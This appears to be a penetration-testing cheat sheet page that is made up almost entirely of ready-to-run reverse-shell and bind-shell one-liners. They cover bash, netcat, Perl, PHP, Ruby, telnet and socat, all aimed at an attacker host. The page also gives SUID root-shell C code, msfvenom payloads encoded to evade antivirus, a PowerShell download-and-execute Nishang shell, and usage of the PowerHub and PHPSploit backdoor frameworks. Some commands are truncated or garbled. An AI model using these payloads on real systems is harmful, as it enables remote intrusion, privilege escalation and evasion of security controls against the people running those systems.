🐚Shells and Reverse Shells Cheat Sheet

SUID C Shells

bin/bash:

int main(void){

setresuid(0, 0, 0);

system("/bin/bash");

}

bin/sh:

int main(void){

setresuid(0, 0, 0);

system("/bin/sh");

}

TTY Shell:

python -c 'import pty; pty.spawn("/bin/bash")'

```
echo os.system('/bin/bash')
```
```
/bin/sh –i
```
```
execute('/bin/sh')
```

LUA:

```
!sh
```
- Privilege Escalation via nmap
```
:!bash
```
- Privilege escalation via vi

Fully Interactive TTY:

                                In reverse shell 
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
                                In Attacker console
stty -a
stty raw -echo
fg
                                In reverse shell
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>

Spawn Ruby Shell:

```
exec "/bin/sh"
```

ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d

Netcat:

```
nc -e /bin/sh ATTACKING-IP 80
```
```
/bin/sh | nc ATTACKING-IP 80
```

rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p

Socket (Encrypted Shell):

Encrypted Bind and Reverse Shells with Socat (Linux/Windows)erev0s.com

Bind Shell:


# Victim machine

socat -d -d TCP4-LISTEN:4443 EXEC:/bin/bash // for linux

TCP4-LISTEN:4443 EXEC:'cmd.exe',pipes // for windows

# Attacker machine

socat - TCP4:<Victim IP>:4443

Reverse Shell:

# Attacker Machine

socat -d -d TCP4-LISTEN:4443 STDOUT

# Victim Machine

socat TCP4:<Attacker IP>:4443 EXEC:/bin/bash //Linux

TCP4:<Attacker IP>:4443 EXEC:'cmd.exe',pipes //Windows

Encrypted Bind Shell:

# Genereate Openssl key and certificate

openssl req -newkey rsa:2048 -nodes -keyout bind.key -x509 -days 1000 -subj '/CN=www.mydom.com/O=My Company Name LTD./C=US' -out bind.crt

# Covert the key file and certificate file to .pem file

cat bind.key bind.crt L > bind.pem

Share the .pem file to victim machine as this is a bind shell

# Victim Machine

socat OPENSSL-LISTEN:4443,cert=bind.pem,verify=0,fork EXEC:/bin/bash //for windows

socat OPENSSL-LISTEN:4443,cert=bind.pem,verify=0,fork EXEC:'cmd.exe',pipes //for windows


# Attacker Machine

socat - OPENSSL:<Victim IP>:4443,verify=0

Encrypted Reverse Shell:

# Genereate Openssl key and certificate

openssl req -newkey rsa:2048 -nodes -keyout bind.key -x509 -days 1000 -subj '/CN=www.mydom.com/O=My Company Name LTD./C=US' -out bind.crt

# Covert the key file and certificate file to .pem file

cat bind.key bind.crt L > bind.pem

# Attacker Machine

socat -d -d OPENSSL-LISTEN:4443,cert=bind.pem,verify=0,fork STDOUT


# Victim Machine

socat OPENSSL:192.168.168.1:4443,verify=0 EXEC:/bin/bash // for linux

OPENSSL:192.168.168.1:4443,verify=0 EXEC:'cmd.exe',pipes // for windows

Telnet Reverse Shell:

rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p

telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

PHP:

```
php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
```
- (Assumes TCP uses file descriptor 3. If it doesn’t work, try 4,5, or 6)

Bash:

```
exec /bin/bash 0&0 2>&0
```

0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196

exec 5<>/dev/tcp/ATTACKING-IP/80 cat <&5 | while read line; do $line 2>&5 >&5; done

# or: while read line 0<&5; do $line 2>&5 >&5; done

bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1

Perl:

```
exec "/bin/sh";
```
```
perl —e 'exec "/bin/sh";'
```

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Windows

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Windows

Stealthy Shells

#1

In the Attacker Machine

msfvenom -p windows/shell/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=<IP addr> LPORT=<port number> -f exe > xcmd.exe

msfvenom -p windows/shell/reverse_tcp -e rc4 -encrypt-key BlueSky LHOST=<IP addr> LPORT=<Port number> -f exe > zcmd.exe

In the Victim Machine

Invoke-WebRequest http://<ip address>/xcmd.exe -UseBasicParsing -Outfile xcmd.exe

Living Off the Land

Windows Tools

PowerShell
cmd.exe
cscript.exe
psexec.exe
wmic.exe
findstr -> for searching the file base
bitsadmin -> load content
regedit -> store information

Linux Tools

netcat, scp, curl, and wget for file transfers
grep and find for searching the file base
awk, gawk, gdb, and other tools

PowerHub

GitHub - AdrianVollmer/PowerHub: A post exploitation tool based on a web application, focusing on bypassing endpoint protection and application whitelistingGitHub

In the Attacker Machine

python3 powerhub.py <Target IP address>

In the Victim Machine

List-HubModules

Recon Local Groups

Get-LocalGroup | ConvertTo-Json | Out-file groups.json

PushTo-Hub groups.json

Exfiltration In the Attacker Machine

dos2unix groups.json

nano groups.json

PHPSploit

GitHub - nil0x42/phpsploit: Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoorGitHub

Start PHPSploit

./phpsploit --interactive

set target <Target URL>

exploit

Reverse Shell using Nishang (Windows Victim Host)

# Installation
sudo apt install nishang

# Nishang Default Shells Location
/usr/share/windows-binaries/nishnag/shells

# Start a python http server to share the payloads
python3 -m http.server 8080

# Start a netcat listener
nc -nlvp 1234

# Download and execute the script in the victim host
powershell iex (New-Object Net.WebClient).DownloadString('http://10.17.6.228:8080/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.17.6.2>

PreviousEnumeration Cheatsheet NextMeterpreter Cheat Sheet

Last updated 1 year ago

Was this helpful?